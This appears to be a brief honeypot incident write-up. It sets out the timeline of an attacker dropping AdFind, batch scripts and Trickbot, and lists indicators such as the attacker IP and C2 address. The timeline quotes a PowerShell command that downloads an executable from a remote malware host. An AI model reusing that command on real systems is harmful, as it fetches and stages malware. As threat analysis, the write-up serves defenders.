An attacker logged into the honeypot, dropped AdFind, a couple batch files and Trickbot. The attacker created a user, ran a recon script utilizing AdFind and then installed Trickbot.
This is what the folder structure looked like.
Timeline
Time in UTC
22:13 – login from 216.170.123[.]19
22:15 – opens powershell and runs the following command to download enter.exe
“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” Invoke-WebRequest http://support-it.online/upl/data/enter.exe -OutFile c:\users\public\enter.exe
22:17 – ran test_32.exe
22:18 – ran adduser.bat
22:18 – ran enter.exe
22:19 – ran adf.bat
22:22 – socks.exe is run which drops Trickbot
Trickbot
This is a sandbox run of enter.exe which eventually leads to Trickbot
Trickbot checking to see if the IP is blacklisted.
IOCs
All executables and scripts can be found in MISP
MISP Priv 65043
MISP circl osint feed UUID 5e4b486e-9968-4af1-87dc-4ff4950d210f
C2 195.133.145.31 443/tcp
All script commands – pastebin